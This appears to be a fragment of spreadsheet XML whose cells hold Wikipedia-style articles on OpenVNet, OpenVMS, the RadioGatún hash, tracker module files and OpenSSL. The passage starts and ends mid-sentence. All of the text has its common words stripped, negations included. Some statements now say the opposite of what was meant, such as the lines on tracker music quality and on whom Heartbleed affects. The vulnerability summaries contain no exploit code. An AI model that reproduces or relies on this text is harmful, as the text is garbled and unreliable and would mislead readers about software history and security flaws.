solution. access server edition relies heavily iptables load balancing never available windows reason. this version also able dynamically create client ("openvpn connect") installers, include client profile connecting particular access server instance. however, user need access server client order connect access server instance; client openvpn community edition used. also openconnect openssh secure socket tunneling protocol stunnel tunnelblick hole punching wireguard references external links official website community website bridgett, adrian february 2008). "openvpn presentation demonstration". archive. hampshire linux user group. tech talks</t>
  </si>
  <si>
    <t>OpenVNet</t>
  </si>
  <si>
    <t>openvnet adds network virtualization layer existing physical network enables data center network administrators tremendously simplify creation operation multi-tenant networks. based edge overlay network architecture provides necessary components network virtualization controller, virtual switch, virtual router, powerful apis. openvnet project started april 2013. almost part implementation already done wakame-vdc project beginning 2012. also open vswitch references external links official website openvnet repository github github external links openvnet presentation slideshare</t>
  </si>
  <si>
    <t>OpenVMS</t>
  </si>
  <si>
    <t>openvms, often referred vms, multi-user, multiprocessing virtual memory-based operating system. designed support time-sharing, batch processing, transaction processing workstation applications. customers using openvms include banks financial services, hospitals healthcare, telecommunications operators, network information services, industrial manufacturers. during 1990s 2000s, approximately half million systems operation worldwide.it first announced digital equipment corporation (dec) vax/vms (virtual address extension/virtual memory system) alongside vax-11/780 minicomputer 1977. openvms subsequently ported alpha systems, itanium-based integrity servers, select x86-64 hardware hypervisors. since 2014, openvms developed supported software inc. (vsi). openvms offers high availability clustering ability distribute system multiple physical machines. this allows clustered applications data remain continuously available operating system software hardware maintenance upgrades performed, part cluster destroyed. cluster uptimes years reported. history origin name changes april 1975, digital equipment corporation embarked project design 32-bit extension pdp-11 computer line. hardware component code named star; operating system code named starlet. roger gourd project lead vms. software engineers dave cutler, dick hustvedt, peter lipman acted technical project leaders. star starlet projects culminated vax-11/780 computer vax/vms operating system. starlet project's code name survives name several system libraries, including starlet.olb starlet.mlb. mostly written macro components written bliss.one original goals backwards compatibility dec's existing rsx-11m operating system. prior v3.0 release, vax/vms included compatibility layer named application migration executive (rsx ame) allowed user mode rsx-11m software unmodified vms. played important role early versions vax/vms, used re-used certain rsx-11m user mode utilities native versions developed. v3.0 release, compatibility mode utilities replaced native implementations. vax/vms v4.0, removed base system, replaced optional layered product named vax-11 rsx. number distributions vax/vms created: microvms distribution vax/vms designed microvax vaxstation hardware, less memory disk space larger systems time. microvms split vax/vms multiple kits, customer could install subset vax/vms tailored specific requirements. microvms releases produced v4.x releases vax/vms discontinued vax/vms v5.0 released. desktop-vms short lived distribution vax/vms sold vaxstation systems. consisted single cd-rom containing bundle vms, decwindows, decnet, vaxcluster support, setup process designed non-technical users. desktop-vms could either directly could installed onto hard drive. desktop-vms versioning scheme beginning v1.0, corresponded v5.x releases vms. unofficial derivative vax/vms named (russian: многофункциональная операционная система виртуальной памятью, lit. 'multifunctional operating system virtual memory') created soviet union 1980s 1700 line clone hardware. added support cyrillic script, translated parts user interface russian. similar derivatives microvms known micromos (russian: микромос mos-32m (russian: мос-32м) also created.with v5.0 release april 1988, began refer vax/vms simply documentation. july 1992, renamed vax/vms openvms indication support open systems industry standards posix unix compatibility, drop connection since migration different architecture underway. openvms name first used openvms v1.0 release november 1992. began using openvms name v6.0 release june 1993. port alpha during 1980s, planned replace platform operating system prism architecture mica operating system. when projects cancelled 1988, team design vax/vms systems comparable performance risc-based unix systems. after number failed attempts design faster vax-compatible processor, group demonstrated feasibility porting applications risc architecture based prism. this creation alpha architecture. project port alpha began 1989, first booted prototype alpha ev3-based alpha demonstration unit early 1991.the main challenge porting architecture designed together, meaning dependent certain details architecture. furthermore, significant amount kernel, layered products, customer-developed applications implemented macro assembly code. some changes needed decouple architecture included creation macro-32 compiler, treated macro high-level language, compiled alpha object code, emulation certain low-level details architecture palcode, interrupt handling atomic queue instructions. port alpha resulted creation separate codebases vax, alpha. alpha code library based snapshot vax/vms code base circa v5.4-2. 1992 release first version openvms alpha systems, designated openvms v1.0. 1994, release openvms v6.1, feature (and version number) parity alpha variants achieved, so-called functional equivalence release. decision version numbering stream pre-production quality releases openvms caused confusion customers, repeated subsequent ports openvms platforms.when ported alpha, initially left 32-bit operating system. this done ensure backwards compatibility software written 32-bit vax. 64-bit addressing first added alpha v7.0 release. order allow 64-bit code interoperate older 32-bit code, openvms create distinction 32-bit 64-bit executables, instead allows 32-bit 64-bit pointers used within code. this known mixed pointer support. 64-bit openvms alpha releases support maximum virtual address space size 8tib 43-bit address space), maximum supported alpha 21064 alpha 21164.one noteworthy alpha-only features openvms openvms galaxy allowed partitioning single server multiple instances openvms. galaxy supported dynamic resource allocation running partitions, ability share memory partitions. port intel itanium 2001, prior acquisition hewlett-packard, compaq announced port openvms intel itanium architecture. itanium port result compaq's decision discontinue future development alpha architecture favour adopting then-new itanium architecture. porting began late 2001, first boot took place 31st january 2003. first boot consisted booting minimal system configuration i2000 workstation, logging system user, running directory command. itanium port openvms supports specific models configurations integrity servers. itanium releases originally named openvms industry standard integrity servers, although names openvms openvms integrity servers commonly used.the itanium port accomplished using source code maintained common within openvms alpha source code library, addition conditional code additional modules changes specific itanium required. this required certain architectural dependencies openvms replaced, emulated software. some changes included using extensible firmware interface (efi) boot operating system, reimplementing functionality previously provided alpha palcode inside kernel, using executable file formats (executable linking format dwarf), adopting ieee default floating point format.as alpha port, binary translator alpha itanium made available, allowing user mode openvms alpha software ported itanium situations possible recompile source code. this translator known alpha environment software translator (aest), also supported translating executables already translated vest.two pre-production releases, openvms v8.0 v8.1, available june 2003 december 2003. these releases intended organizations third-party vendors involved porting software packages openvms i64. first production release, v8.2, released february 2005. v8.2 also released alpha, subsequent v8.x releases openvms maintained feature parity alpha itanium architectures. port x86-64 when software inc. (vsi) announced secured rights develop openvms operating system also announced intention port openvms x86-64 architecture. porting effort concurrently establishment company, well development vsi's itanium alpha releases openvms v8.4-x. x86-64 port targeted specific servers dell, well certain virtual machine hypervisors. initial support targeted virtualbox. support vmware announced 2020, hyper-v described future target. 2021, x86-64 port demonstrated running intel atom-based single-board computer.as alpha itanium ports, x86-64 port made changes simplify porting supporting openvms platform including: replacing proprietary compiler backend used compilers llvm, changing boot process openvms booted memory disk, simulating four privilege levels openvms software since x86-64's privilege levels usable openvms.the first boot announced 2019. this involved booting openvms virtualbox, successfully running directory command. 2020, v9.0 early adopter's release made available small number customers. this consisted openvms operating system running virtualbox certain limitations significantly, layered products available, code compiled x86-64 using cross compilers itanium-based openvms systems. following v9.0 release, released series updates monthly bimonthly basis added additional functionality hypervisor support. these designated v9.0-a v9.0-h. june 2021, released v9.1 field test, available vsi's customers partners. v9.1 shipped image installed onto variety hypervisors, onto proliant dl380 servers starting v9.1-a release.openvms x86-64 reached general availability july 2022. influence during 1980s, mica operating system prism architecture intended eventual successor vms. mica designed maintain backwards compatibility applications also supporting ultrix applications kernel. mica ultimately cancelled along rest prism platform, leading dave cutler leave microsoft. microsoft, cutler creation windows operating system, heavily inspired architecture mica. result, considered ancestor windows together rsx-11, vaxeln mica, many similarities exist nt.a now-defunct project named freevms attempted develop open source operating system following conventions. freevms built microkernel supported x86-64 architecture. prior work investigating implementation using microkernel-based architecture previously undertaken prototyping exercise employees assistance carnegie mellon university using mach microkernel ported vaxstation 3100 hardware, adopting multiserver architectural model. architecture openvms operating system layered architecture, consisting privileged executive, intermediately-privileged command language interpreter, unprivileged utilities run-time libraries (rtls). unprivileged code typically invokes functionality executive system services (equivalent system calls operating systems). openvms' layers mechanisms built around certain features architecture, including: availability four processor access modes (named kernel, executive, supervisor user, order decreasing privilege). each mode stack, memory page memory protections specified per-mode. virtual address space partitioned process-private space sections, system space sections common processes. interrupt priority levels used synchronization. hardware support delivering asynchronous system traps processes.these architecture mechanisms implemented alpha, itanium x86-64 either mapping corresponding hardware mechanisms architectures, emulation (via palcode alpha, software itanium x86-64). executive kernel openvms executive comprises privileged code data structures reside system space. executive subdivided kernel, consists code runs kernel access mode, less-privileged code outside kernel runs executive access mode.the components executive executive access mode include record management services, certain system services image activation. main distinction kernel executive access modes operating system's core data structures read executive mode, require kernel mode written code running executive mode switch kernel mode will, meaning barrier kernel executive modes intended safeguard accidental corruption opposed security mechanism.the kernel comprises operating system's core data structures (e.g. page tables, database scheduling data), routines operate structures. kernel typically described three major subsystems: i/o, process time management, memory management. addition, functionality logical name management, synchronization system service dispatch implemented inside kernel. openvms allows user mode code suitable privileges switch executive kernel mode using $cmexec $cmkrnl system services, respectively. this allows code outside system space direct access executive's routines system services. addition allowing third-party extensions operating system, privileged images used core operating system utilities manipulate operating system data structures undocumented interfaces. file system typical user application interface file system record management services (rms), although applications interface directly underlying file system system services. file systems supported referred files-11 on-disk structures (ods), significant ods-2 ods-5. also capable accessing files 9660 cd-roms magnetic tape ansi tape labels.files-11 limited 2tib volumes. attempted replace log-structured file system file system named spiralog first released 1995. however, spiralog discontinued variety problems, including issues handling full volumes. instead, discussion porting open source gfs2 file system openvms. command language interpreter openvms command language interpreter (cli) implements command line interface openvms; responsible executing individual commands, well command procedures (equivalent shell scripts batch files). standard openvms digital command language, although options available well. unlike unix shells, typically isolated process behave like user mode program, openvms clis optional component process, exist alongside executable image process run. whereas unix shell typically executables creating separate process using fork-exec, openvms typically load executable image process, transfer control image, ensure control transferred back image exited process returned original state.due fact loaded address space user code, responsible invoking image activation image rundown, mapped process address space supervisor access mode higher level privilege user code. this order prevent accidental malicious manipulation cli's code data structures user mode code. features clustering openvms supports clustering (first called vaxcluster later vmscluster), multiple computers instance operating system. clustered computers (nodes) fully independent other, share devices like disk drives printers. communication across nodes provides single system image abstraction. nodes connected proprietary hardware connection called cluster interconnect standard ethernet lan. openvms supports nodes single cluster. also allows mixed-architecture clusters. (vax, alpha, itanium computers different architecture.) openvms clusters allow applications function planned unplanned outages. planned outages include hardware software upgrades. networking decnet protocol suite tightly integrated vms, allowing remote logins, well transparent access files, printers resources systems network. modern versions support traditional phase decnet protocol, well osi-compatible phase (also known decnet-plus). support tcp/ip provided optional tcp/ip services openvms layered product (originally known vms/ultrix connection, ultrix communications extensions ucx). tcp/ip services based port network stack openvms, along support common protocols ssh, dhcp, smtp. sold software package named pathworks (originally known personal computer systems architecture pcsa) allowed personal computers running ms-dos, microsoft windows os/2, apple macintosh serve terminal systems, systems file print server. pathworks later renamed advanced server openvms, eventually replaced port samba time itanium port.dec provided local area transport (lat) protocol allowed remote terminals printers attached system terminal server decserver family. programming (and successor companies) provided wide variety programming languages vms. officially supported languages vms, either current historical, include: among openvms's notable features common language environment, strictly defined standard specifies calling conventions functions routines, including stacks, registers, etc., independent programming language. because this, possible call routine written language (for example, fortran) another (for example, cobol), without needing know implementation details target language. openvms implemented variety different languages common language environment calling standard supports freely mixing languages. created tool named structure definition language (sdl), allowed data type definitions generated different languages common definition. development tools provided collection software development tools layered product named decset (originally named vaxset). this consisted language-sensitive editor (lse), version control system (the code management system cms), build tool (the module management system mms), static analyzer (the source code analyzer sca), profiler (the performance coverage analyzer pca) well test manager (the digital test manager dtm). addition, number text editors included operating system, including edt, teco.the openvms debugger supports compilers many third party languages. allows breakpoints, watchpoints interactive runtime program debugging either using command line graphical user interface. pair lower-level debuggers, named delta xdelta, used debug privileged code additional normal application code.in 2019, released officially-supported integrated development environment based visual studio code. this allows applications developed debugged remotely microsoft windows, macos linux workstation. database management created number optional database products vms, marketed information architecture family. these products included: relational database system originally used proprietary relational data operator (rdo) query interface, later gained support. dbms database management system uses codasyl network model data manipulation language (dml). digital standard mumps (dsm) integrated programming language key-value database. common data dictionary (cdd) central database schema repository, allowed schemas shared different applications, data definitions generated different programming languages. datatrieve query reporting tool could access data files well dbms databases. application control management system (acms) transaction processing monitor, allows applications created using high-level task description language (tdl). individual steps transaction implemented using commands, common language environment procedures. user interfaces implemented using tdms, decforms digital's all-in-1 office automation product. rally, decadmire fourth-generation programming languages (4gls) generating database-backed applications. decadmire featured integration acms, later provided support generating visual basic client-server applications windows pcs.in 1994, sold rdb, dbms oracle, remain active development. 1995, sold intersystems, renamed open eventually replaced caché product.examples third-party database management systems openvms include mariadb, mimer system 1032. user interfaces originally designed used managed interactively using dec's text-based video terminals vt100, hardcopy terminals decwriter series. since introduction vaxstation line 1984, optionally supported graphical user interfaces workstations terminals vt1000 series. text-based user interfaces digital command language (dcl), served primary command language interpreter (cli) openvms since first release. other official clis available include rsx-11 (vax only), various unix shells. provided tools creating text-based user interface applications form management system (fms) terminal data management system (tdms), later succeeded decforms. lower level interface named screen management services (smg$), comparable unix curses, also exists. graphical user interfaces over years, gone number different toolkits interfaces: original graphical user interface proprietary windowing system known workstation software (vws), first released vaxstation 1984. exposed called user interface services (uis). limited selection hardware. 1989, replaced x11-based windowing system named decwindows. first included vax/vms v5.1. early versions decwindows featured interface built proprietary toolkit named user interface (xui). layered product named uisx provided allow vws/uis applications decwindows. parts subsequently used open software foundation foundation motif toolkit. 1991, replaced motif toolkit, creating decwindows motif. result, motif window manager became default decwindows interface openvms v6.0, although window manager remained option. 1996, part openvms v7.1, released desktop interface decwindows motif, based common desktop environment (cde). alpha itanium systems, still possible select older mwm-based (referred "decwindows desktop") login time. desktop never ported releases openvms.versions running alpha workstations 1990s supported opengl accelerated graphics port (agp) graphics adapters. also provides support older graphics standards phigs. modern versions decwindows based x.org server. security openvms provides various security features mechanisms, including security identifiers, resource identifiers, subsystem identifiers, acls, intrusion detection detailed security auditing alarms. specific versions evaluated trusted computer system evaluation criteria class and, sevms security enhanced release class openvms also holds itsec rating (see ncsc common criteria). passwords hashed using purdy polynomial. vulnerabilities early versions included number privileged user accounts (including system, field, systest decnet) default passwords often left unchanged system managers. number computer worms including wank worm father christmas worm exploited default passwords gain access nodes decnet networks. this issue also described clifford stoll cuckoo's means markus hess gained unauthorized access vax/vms systems. v5.0, default passwords removed, became mandatory provide passwords accounts system setup. 33-year-old vulnerability alpha discovered 2017 assigned cve-2017-17482. affected platforms, vulnerability allowed attacker access command line carry privilege escalation attack. vulnerability relies exploiting buffer overflow command processing code, ability user interrupt running image (program executable) ctrl/y return prompt, fact retains privileges interrupted image. buffer overflow allowed shellcode executed privileges interrupted image. this could used conjunction image installed higher privileges attacker's account bypass system security. posix compatibility various official unix posix compatibility layers created vms. first dec/shell layered product consisting ports version unix bourne shell several unix utilities vax/vms. 1992, released posix openvms layered product, included shell based korn shell. posix openvms later replaced open source (gnu's vms) project, first included openvms media 2002. amongst tools, includes port bash shell vms. examples third party unix compatibility layers include eunice. hobbyist programs 1997 openvms number layered products made available free charge hobbyist, non-commercial part openvms hobbyist program. since then, several companies producing openvms software made products available terms, process software. prior x86-64 port, cost hardware capable running openvms made emulators simh common choice hobbyist installations.in march 2020, announced openvms hobbyist program. this followed vsi's announcement community license program (clp) april 2020, intended replacement hobbyist program. launched july 2020, provides licenses openvms releases alpha integrity systems. openvms x86-64 licenses made available stable version released architecture. openvms covered clp, since releases openvms vax, versions still owned hpe. release history also comparison operating systems terry shannon event flag references further reading getting started openvms, michael duffy, isbn 1-55558-279-6 introduction openvms, edition, lesley ogilvie rice, isbn 1-55558-194-3 ruth goldenberg; saro saravanan (1994). openvms internals data structures: version 1.5. digital press. isbn 978-1555581206. openvms alpha internals data structures: memory management, ruth goldenberg, isbn 1-55558-159-5 openvms alpha internals data structures scheduling process control version 7.0, ruth goldenberg, saro saravanan, denise dumas, isbn 1-55558-156-0 vax/vms internals data structures: version ("idsm"), ruth goldenberg, saro saravanan, denise dumas, isbn 1-55558-059-9 writing real programs dcl, second edition, stephen hoffman, paul anagnostopoulos, isbn 1-55558-191-9 writing openvms alpha device drivers margie sherlock, leonard szubowicz, isbn 1-55558-133-1 openvms performance management, joginder sethi, isbn 1-55558-126-9 getting started openvms system management, edition, david donald miller, stephen hoffman, lawrence baldwin, isbn 1-55558-243-5 openvms user's guide, second edition, patrick holmay, isbn 1-55558-203-6 using decwindows motif openvms, margie sherlock, isbn 1-55558-114-5 wayne sewell (1992). inside vms: system manager's system programmer's guide internals. nostrand reinhold. isbn 0-442-00474-5. hitchhiker's guide unsupported-undocumented-can-go-away-at-any-time feature vms, bruce ellis, isbn 1-878956-00-0 roland hughes (december 2006). minimum need know openvms application developer. isbn 978-0-9770866-0-3. external links software: current roadmap future releases software: documentation hoffmanlabs.org openvms comp.os.vms usenet group, archives google groups</t>
  </si>
  <si>
    <t>RadioGatún</t>
  </si>
  <si>
    <t>radiogatún cryptographic hash primitive created guido bertoni, joan daemen, michaël peeters, gilles assche. first publicly presented nist second cryptographic hash workshop, held santa barbara, california, august 24–25, 2006, part nist hash function competition. team developed radiogatún went make considerable revisions cryptographic primitive, leading keccak sha-3 algorithm.radiogatún family different hash functions, distinguished single parameter, word width bits (w), adjustable word sizes official test vectors 32-bit 64-bit variants radiogatún. algorithm uses words, using bits, store internal state, 32-bit version needs bytes store state (since word needs bits four bytes, multiplied four 232) 64-bit version bytes (each word using eight bytes). although radiogatún derivative panama, stream cipher hash construction late 1990s whose hash construction broken, radiogatún panama's weaknesses used hash function. 2019, radiogatún still secure hash function; largest version radiogatún broken word size bits. radiogatún claimed security strength bits 32-bit version bits 64-bit version. best known cryptanalysis broken claim: needs bits work 32-bit version bits work 64-bit version. radiogatún used either hash function stream cipher; output arbitrarily long stream pseudo-random numbers; kind hash construction known "extendable-output function" (xof). claimed strength algorithm's designers, original radiogatún paper, claimed first bits (where word width used) radiogatún's output cryptographically secure hash function.since publishing paper, designers revised security claim, claim radiogatún security cryptographic sponge function capacity 19w. this means 32-bit version radiogatún used make hash bits security (both collision attacks preimage attacks), 64-bit version offers bits security. implementation details designers call radiogatún "ideal mangling function". radiogatún uses "belt" "mill" cryptographically process binary data, majority mangling operations performed "mill" part radiogatún.keccak removed belt, increased size mill words words, made mill function somewhat complicated.the core belt function looks like this: mill function mill(a) looks like this: wikibooks page radiogatún provides full implementation details, module:radiogatun32 implementation 32-bit version radiogatún. cryptanalysis paper "two attacks radiogatún", dmitry khovratovich presents attacks break designers' security claims, complexity 218w another complexity 223.1w. khovratovich also authored paper, entitled "cryptanalysis hash functions structures", describes attack complexity 218w.in paper "analysis collision resistance radiogatún using algebraic techniques", charles bouillaguet pierre-alain fouque present generating collisions 1-bit version algorithm using attack needs 224.5 operations. attack extended larger versions since "all possible trails knew 1-bit version turned impossible extend n-bit versions." this attack less effective attacks also break radiogatún's security claim. effective attack algorithm, complexity 211w, given paper "cryptanalysis radiogatun" thomas fuhr thomas peyrin. paper, break 2-bit (word size two) version radiogatún. while effective attacks, attack still break security claim. developers radiogatún stated "own experiments inspire confidence radiogatún". test vectors radiogatún variants designers supplied test vectors (published hash values sample inputs programmers verify correctly implementing algorithm) 32-bit 64-bit versions. radiogatún[32] these test vectors, generated using 32-bit version radiogatún, show first bits radiogatún[32]'s arbitrarily long output stream: radiogatun[32]("") f30028b54afab6b3e55355d277711109a19beda7091067e9a492fb5ed9f20117 radiogatun[32]("the quick brown jumps lazy dog") 191589005fec1f2a248f96a16e9553bf38d0aee1648ffa036655ce29c2e229ae radiogatun[32]("the quick brown jumps lazy cog") ebdc1c8dcd54deb47eeefc33ca0809ad23cd9ffc0b5254be0fdabb713477f2bd radiogatún[64] here hashes 64-bit version: radiogatun[64]("") 64a9a7fa139905b57bdab35d33aa216370d5eae13e77bfcdd85513408311a584 radiogatun[64]("the quick brown jumps lazy dog") 6219fb8dad92ebe5b2f7d18318f8da13cecbf13289d79f5abf4d253c6904c807 radiogatun[64]("the quick brown jumps lazy cog") c06265cac961ea74912695ebf20f1c256a338bc0e980853a3eef188d4b06fce5 references external links radiogatún hash function family, radiogatún's official page, hash's official description, public domain reference code, test vectors rg32hash, independent public-domain implementation 32-bit version radiogatún</t>
  </si>
  <si>
    <t>Module file</t>
  </si>
  <si>
    <t>module file (mod music, tracker music) family music file formats originating file format amiga systems used late 1980s. those produce files (using software called music trackers) listen form worldwide scene, part demoscene subculture. mass interchange "mod music" "tracker music" (music stored module files created trackers) evolved early fido networks. many websites host large numbers files, comprehensive archive. nowadays, module files, including ones compressed form, supported popular media players vlc, foobar2000, exaile many others (mainly inclusion common playback libraries libmodplug gstreamer). structure module files store digitally recorded samples several "patterns" "pages" music data form similar spreadsheet. these patterns contain note numbers, instrument numbers, controller messages. number notes played simultaneously depends many "tracks" pattern.a disadvantage module files real standard specification modules played back properly, result modules sounding slightly different different players. this mostly effects applied samples module file authors different players choose implement them. however, tracker music advantage requiring little overhead playback, executed real-time. popular formats each module file format builds concepts introduced predecessors. format (.mod) format first file format tracked music. basic version format (with pattern commands short samples supported) introduced karsten obarski’s ultimate soundtracker 1987 commodore amiga. designed channels fifteen samples. ultimate soundtracker soon superseded noisetracker protracker, allowed tracker commands (effects) instruments. later, variants format appeared personal computer extended number channels, added panning commands (the amiga’s four hardware channels pre-defined stereo setup) expanded amiga’s frequency limit, allowing octaves notes supported. arguably widespread tracker formats (also many computer games demos), also simplest use, also provides pattern commands use. oktalyzer format (.okt) this early effort bring eight-channel sound amiga. later replayers improved sound quality attainable modules demanding mixing technologies. multitracker format (.mtm) produced american demoscene group renaissance, multitracker brought 32-channel sound tracker community. songs took full advantage simultaneous channels extremely taxing typical computers era. med/octamed format (.med) this format similar sound/pro/noisetracker, data stored different. direct clone soundtracker, different features file formats. octamed eight-channel version med, eventually evolved octamed soundstudio (which offers 128-channel sound, optional synth sounds, midi support many high-end features). format (.ahx) this format synth-tracker. there samples module file, rather descriptions synthesize required sound. this results small audio files (ahx modules typically 1k–4k size), characteristic sound. designed music chiptune sound. tracker requires kickstart memory. screamtracker format (.s3m) scream tracker format added sample tuning (defining exact frequency middle samples), increased number playback channels, made extra column specifically volume control (which extended trackers handle panning commands well), compressed pattern data smaller file sizes. also widespread formats support sample playback realtime synthesis (through opl2 chip) time. fasttracker format (.xm) with format, fasttracker introduced concept "instruments", applied volume panning envelopes samples. also added ability several samples instrument multi-sampled instruments drum sets. uses instrument-based panning instrument numbers patterns always reset channel’s panning current sample's initial panning. uses effect command letters, plus sound control. composer define initial tempos speeds; provide envelopes samples assigning instruments; sample looping apply automatic sample vibrato oscillation. impulse tracker format (.it) impulse tracker introduced format, which, comparison format, allows instruments also specify transposition assigned samples depending note played, applying resonant filters samples, defining “new note actions” (nnas) instruments release playing notes pattern channel note already playing, helps keep number pattern channels still able high polyphony. like files (and contrary files), panning channel-based, meaning channels initial position overridden panning commands instruments’ samples’ default panning settings. scene process composing module files, known tracking, skillful activity involves much closer contact musical sound conventional composition, every aspect sonic event coded, pitch duration exact volume, panning, laying numerous effects echo, tremolo fades. once module file finished, released tracker community. composer uploads composition several sites module files archived, making available audience, download file computers. encoding textual information within module file, composers maintain contact audiences another including email addresses, greetings fans composers, virtual signatures.although trackers considered technical limitations, prevent creative individual producing music indiscernible professionally created music. demosceners focused pushing limits technology. many tracker musicians gained international prominence within software users went work high-profile video game studios, began appear large record labels. notable artists include andrew sega, purple motion, darude, alexander brandon, peter hajba, axwell, venetian snares, jesper kyd, tdk, thomas bergersen, markus kaarlonen, michiel gardopée. also widely known many aphrodite's early releases made synchronized amigas running octamed, james holden made majority early material jeskola buzz. deadmau5 erez eisen infected mushroom used impulse tracker early career. music disk music disk, musicdisk, term used demoscene describe collection songs made computer. they essentially computer equivalent album. music disk typically packaged form program custom user interface, listener need software play songs. "disk" part term comes fact music disks made single floppy disk, could easily distributed demo parties. modern platforms, music disks usually downloaded hard disk drive. amiga music disks usually consist files, music disks often contain multichannel formats music disks also common commodore atari native formats. related terms include music pack, refer demoscene music collection include player, chipdisk, music disk containing chiptunes, become popular given large size music disks. software module file players converters players xmplay (windows), un4seen developments, also created format ozmod (java, cross-platform) winamp (windows) aimp player (windows) opencubicplayer (linux/bsd port actively maintained) (linux, android) foobar2000 (windows) (with foo_dumb foo_openmpt plugin) mod4win (windows), first windows player k-multimedia player (windows) audacious (linux, windows) xmms xmms2 (linux) music player daemon (linux) deadbeef (linux, windows, android) mikmod (linux, macos, windows, dos) modo computer music player (android) deliplayer (windows) amigaamp (amiga) javamod (linux, macos, windows) converters trackers (macos) audacious (linux) openmpt (windows) sunvox (windows, macos, linux, android, ios) milkytracker (windows, macos, linux, android) schism tracker (windows, macos, linux) protracker (amiga, windows, macos, linux) octamed (amiga) renoise (windows, macos, linux) unix amiga delitracker emulator (linux) houstontracker (ti-82/83/84) radium (windows, macos, linux) libraries libmikmod maintained mikmod project libmodplug maintained modplug xmms plugin project libopenmpt maintained openmpt project libbass developed un4seen developments used xmplay libxmp ufmod also tracker (file format) category:tracker musicians demoscene traxweekly static line references further reading leonard, andrew april 1999). "mod love with ears, computers little code, "mod trackers" build worlds sound". salon. salon media group. rene lysloff; leslie gay; andrew ross october 2003). music technoculture. wesleyan university press. 352. isbn 978-0819565143. brandon, alexander 2015). "from expert mods demoscene". original sound version. archived original september 2017. retrieved 2015. external links archive amiga music preservation tracker's handbook</t>
  </si>
  <si>
    <t>OpenSSL</t>
  </si>
  <si>
    <t>openssl software library applications secure communications computer networks eavesdropping need identify party end. widely used internet servers, including majority https websites. openssl contains open-source implementation protocols. core library, written programming language, implements basic cryptographic functions provides various utility functions. wrappers allowing openssl library variety computer languages available. openssl software foundation (osf) represents openssl project legal capacities including contributor license agreements, managing donations, openssl software services (oss) also represents openssl project, support contracts. openssl available unix-like operating systems (including linux, macos, bsd) microsoft windows. project history openssl project founded 1998 provide free encryption tools code used internet. based fork ssleay eric andrew young hudson, unofficially ended development december 1998, young hudson went work security. initial founding members mark cox, ralf engelschall, stephen henson, laurie, paul sutton.as 2019, openssl management committee consisted people developers commit access (many also part openssl management committee). there full-time employees (fellows) remainder volunteers. project budget less million year relies primarily donations. development sponsored akamai. major version releases algorithms openssl supports number different cryptographic algorithms: ciphers aes, blowfish, camellia, chacha20, poly1305, seed, cast-128, des, idea, rc2, rc4, rc5, triple des, gost 28147-89, cryptographic hash functions md5, md4, md2, sha-1, sha-2, sha-3, ripemd-160, mdc-2, gost 34.11-94, blake2, whirlpool, public-key cryptography rsa, dsa, diffie–hellman exchange, elliptic curve, x25519, ed25519, x448, ed448, gost 34.10-2001, sm2(perfect forward secrecy supported using elliptic curve diffie–hellman since version 1.0.) fips validation fips u.s. federal program testing certification cryptographic modules. early fips 140-1 certificate openssl's revoked july 2006 "when questions raised validated module's interaction outside software." module re-certified february 2007 giving fips 140-2. openssl 1.0.2 supported openssl fips object module (fom), built deliver fips approved algorithms fips 140-2 validated environment. openssl controversially decided categorize 1.0.2 architecture 'end life' 'eol', effective december 2019, despite objections version openssl currently available support fips mode. result eol, many users unable properly deploy fell compliance secure extended support 1.0.2 architecture, although remained validated eight months further. fips object module remained fips 140-2 validated several formats september 2020, nist deprecated usage fips 186-2 digital signature standard designated non-compliant modules 'historical'. this designation includes caution federal agencies include module procurements. three openssl validations included deprecation openssl fips object module (certificate #1747), openssl fips object module (certificate #2398), openssl fips object module (certificate #2473). many 'private label' openssl-based validations clones created consultants also moved historical list, although fips validated modules replacement compatibility avoided deprecation, boringcrypto google cryptocomply safelogic.openssl restored fips mode underwent fips 140-2 testing, significant delays: effort first kicked 2016 support safelogic support oracle 2017, process challenging. october 2020, openssl fips provider added cmvp implementation under test list, reflected official engagement testing proceed fips 140-2 validation. this resulted slew certifications following months. licensing openssl dual-licensed openssl license ssleay license, means terms either licenses used. openssl license apache license ssleay license bears similarity 4-clause license. openssl license apache license 1.0, apache license 2.0, requires phrase "this product includes software developed openssl project openssl toolkit" appear advertising material redistributions (sections openssl license). restriction, openssl license apache license incompatible gpl. some developers added openssl exception licenses specifically permits using openssl system. wget climm exceptions. some packages (like deluge) explicitly modify license adding extra section beginning license documenting exception. other packages lgpl-licensed gnutls, bsd-licensed botan, mpl-licensed nss, perform task. openssl announced august 2015 would require contributors sign contributor license agreement (cla), openssl would eventually relicensed terms apache license 2.0. this process commenced march 2017, complete 2018.on september 2021, openssl 3.0.0 released apache license 2.0. notable vulnerabilities denial service: asn.1 parsing openssl 0.9.6k certain asn.1 sequences triggered large number recursions windows machines, discovered november 2003. windows could handle large recursions correctly, openssl would crash result. being able send arbitrary large numbers asn.1 sequences would cause openssl crash result. ocsp stapling vulnerability when creating handshake, client could send incorrectly formatted clienthello message, leading openssl parsing message. assigned identifier cve-2011-0014 project, affected openssl versions 0.9.8h 0.9.8q openssl 1.0.0 1.0.0c. since parsing could lead read incorrect memory address, possible attacker cause dos. also possible applications expose contents parsed ocsp extensions, leading attacker able read contents memory came clienthello. asn.1 vulnerability when using basic input/output (bio) file based functions read untrusted format data, openssl vulnerable. this vulnerability discovered april 2012, assigned identifier cve-2012-2110. while directly affecting ssl/tls code openssl, application using asn.1 functions (particularly d2i_x509 d2i_pkcs12) also affected. ssl, dtls plaintext recovery attack handling cipher-suites ssl, tls, dtls, openssl found vulnerable timing attack processing. nadhem alfardan kenny paterson discovered problem, published findings february 2013. vulnerability assigned identifier cve-2013-0169. predictable private keys (debian-specific) openssl's pseudo-random number generator acquires entropy using complex programming methods. keep valgrind analysis tool issuing associated warnings, maintainer debian distribution applied patch debian's variant openssl suite, inadvertently broke random number generator limiting overall number private keys could generate 32,768. broken version included debian release september 2006 (version 0.9.8c-1), also compromising debian-based distributions, example ubuntu. ready-to-use exploits easily available.the error reported debian 2008. debian distribution (etch), problems fixed version 0.9.8c-4etch3, fixes debian distribution (lenny) provided version 0.9.8g-9. heartbleed openssl versions 1.0.1 1.0.1f severe memory handling implementation heartbeat extension could used reveal application's memory every heartbeat (cve-2014-0160). reading memory server, attackers could access sensitive data, including server's private key. this could allow attackers decode earlier eavesdropped communications encryption protocol used ensure perfect forward secrecy. knowledge private could also allow attacker mount man-in-the-middle attack future communications. vulnerability might also reveal unencrypted parts users' sensitive requests responses, including session cookies passwords, might allow attackers hijack identity another user service.at disclosure april 2014, around half million internet's secure servers certified trusted authorities believed vulnerable attack. however, heartbleed affect server client. injection vulnerability injection vulnerability (cve-2014-0224) security bypass vulnerability results weakness openssl methods used keying material.this vulnerability exploited 